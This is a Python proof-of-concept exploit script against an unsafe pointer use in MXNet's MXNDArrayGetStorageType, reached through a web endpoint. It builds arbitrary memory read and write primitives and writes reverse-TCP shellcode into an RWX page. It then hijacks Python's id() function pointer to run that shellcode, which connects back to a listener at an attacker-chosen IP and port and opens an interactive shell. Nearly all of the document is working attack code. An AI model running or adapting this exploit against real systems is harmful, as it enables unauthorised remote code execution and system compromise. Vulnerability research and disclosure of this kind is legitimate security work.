Python
#!/usr/bin/env python3

'''

    MXNet Unsafe Pointer Usage Exploit




    Payload:

        Reverse TCP shell

'''

import ctypes

import mxnet as mx

import requests, json, base64

from pwn import *

from struct import pack, unpack

from time import sleep

from threading import Thread

from sys import argv




URL = 'http://127.0.0.1:5000'

PORT = 1337

BIND_ADDRESS = '127.0.0.1'

REVERSE_SHELL_IP = 0




def MXNDArrayGetStorageType(handle, storage_type=-1):

    '''

        Exercise the vulnerable code path in src/c_api/c_api.cc




        int MXNDArrayGetStorageType(NDArrayHandle handle,

                                    int *out_storage_type) {

            API_BEGIN();

            NDArray *arr = static_cast<NDArray*>(handle);

            if (!arr->is_none()) {

                *out_storage_type = arr->storage_type();

            } else {

                *out_storage_type = kUndefinedStorage;

            }

            API_END();

        }

    '''

    global URL

    path = '/get_storage_type'

    params = {}

    params['handle'] = handle

    if storage_type != -1:

        params['storage_type'] = storage_type

    response = requests.get(URL+path, params=params)

    ret = int(json.loads(response.text)['result'])

    return ret




def _id(id=0, objtype='int'):

    '''

        Plant a bytestring into memory and obtain it's address. Not strictly

        required (r64 & w64 are the only required functions), however it

        greatly simplifies exploitation for demonstration.

    '''

    global URL

    path = '/id'

    params = {}

    if objtype != 'int':

        id = base64.b64encode(id)

    params['id'] = id

    params['objtype'] = objtype

    response = requests.get(URL+path, params=params)

    ret = int(json.loads(response.text)['result'])

    return ret




def rwx():

    '''

        Obtain the location of the RWX page. This is optional, however

        introspection using reads will require per-version of python &

        ctypes, making this less portable for demonstration.

    '''

    global URL

    path = '/rwx'

    response = requests.get(URL+path)

    ret = int(json.loads(response.text)['result'])

    return ret




def get_id_reference():

    '''

        To use id as a trigger, we need to know where it lies in memory.

    '''

    global URL

    path = '/'

    response = requests.get(URL+path)

    ret = 0

    for line in response.text.split('\n'):

        if 'id' in line:

            ret = int(line.split(': ')[1])

            break

    print('[i]\tgot id', hex(ret))

    return ret




def sizeof(obj):

    '''

        Determine the size of a Python object in memory.

        Source: https://github.com/DavidBuchanan314/unsafe-python

    '''

    return type(obj).__sizeof__(obj)




def r64(addr):

    '''

        Read arbitrary memory with a constraint that addr - 0x50 must be

        non-null. We detect when this condition occurs, and fail properly.

    '''

    storage_type1 = MXNDArrayGetStorageType(addr-0x50)

    storage_type2 = MXNDArrayGetStorageType(addr-0x50+4)

    if storage_type1.value == 0xffffffff or storage_type2.value == 0xffffffff:

        return False

    ret = (storage_type2.value << 32) | storage_type1.value

    return ret




def w64(addr, val):

    '''

        Write 64 bytes to an address in memory. Note that because we have a

        4 byte write, we have to write twice to put a QWORD into memory.

    '''

    print(f'[w]\t\tw64({hex(addr)}, {hex(val)})')

    fake_object_addr1 = _id(

        b'A' * 0x10 + b'\0' * 0x40 + pack('<Q', val)  + pack('<Q', val),

        objtype='base64') + sizeof(b'')-1

    MXNDArrayGetStorageType(

            fake_object_addr1,

            addr

            )

    MXNDArrayGetStorageType(

            fake_object_addr1 + 4,

            addr + 4

            )




def trigger(_):

    sleep(1)

    print('[+]\tTriggering the exploit!')

    try:

        _id(1)

    except:

        pass




if __name__ == '__main__':

    if len(argv) != 4:

        print('Usage:\n\tunsafe_pointer_exploit.py <target URL> <rev_shell_ip> <port>')

        exit(1)

    URL = argv[1]

    BIND_ADDRESS = argv[2]

    PORT = int(argv[3])

    REVERSE_SHELL_IP = int(BIND_ADDRESS.split('.')[0]) << 24

    REVERSE_SHELL_IP |= int(BIND_ADDRESS.split('.')[1]) << 16

    REVERSE_SHELL_IP |= int(BIND_ADDRESS.split('.')[2]) << 8

    REVERSE_SHELL_IP |= int(BIND_ADDRESS.split('.')[3])

    print(f'{"*"*8} MXNet Unsafe Pointer Usage Exploit {"*"*8}')

    id_ref = get_id_reference()

    RWX_ADDR = rwx()

    print(f'[+]\tderived RWX_ADDR: {hex(RWX_ADDR)}')

    RWX_ADDR += 0x800

    print(f'[+]\tset RWX_ADDR  += 0x800 (halfway through page): {hex(RWX_ADDR)}')




    # This shellcode was obtained from

        #      https://shell-storm.org/shellcode/files/shellcode-857.html

    SHELLCODE = b'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a' +\

                b'\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0' +\

                b'\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24' +\

                b'\x02'+ pack('>H', PORT) +b'\xc7\x44\x24\x04' +\

                pack('>I', REVERSE_SHELL_IP)+ b'\x48\x89\xe6\x6a\x10' +\

                b'\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48' +\

                b'\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a' +\

                b'\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54' +\

                b'\x5f\x6a\x3b\x58\x0f\x05'

    SHELLCODE += b'\x00' * ((8-len(SHELLCODE) % 8)) # pad to 8 bytes

    print(f'[+]\tWriting shellcode to {hex(RWX_ADDR)}')

    for i in range(0, len(SHELLCODE), 8):

        v = unpack('<Q', SHELLCODE[i:i+8])[0]

        sc_addr = RWX_ADDR+i

        w64(sc_addr, v)

    print('[+]\tShellcode written!')




    print('[+]\tDeriving address of Python3 builting function id...')

    id_addr = id_ref+0x30




    print('[+]\tOverwriting id() function pointer with address to shellcode...')

    w64(id_addr, RWX_ADDR)




    print('[^]\tSetting up listening shell...')

    l = listen(port=PORT, bindaddr=BIND_ADDRESS) # pwntools listen




    t = Thread(target=trigger, args=(0,))

    t.start()

   

    c = l.wait_for_connection()

    print('['+'-'*60+']')

    print('[+]\tReceived a shell!!!')

    print('['+'-'*60+']')

    c.send(b'id;whoami;pwd;\n\n\n\n')

    c.interactive()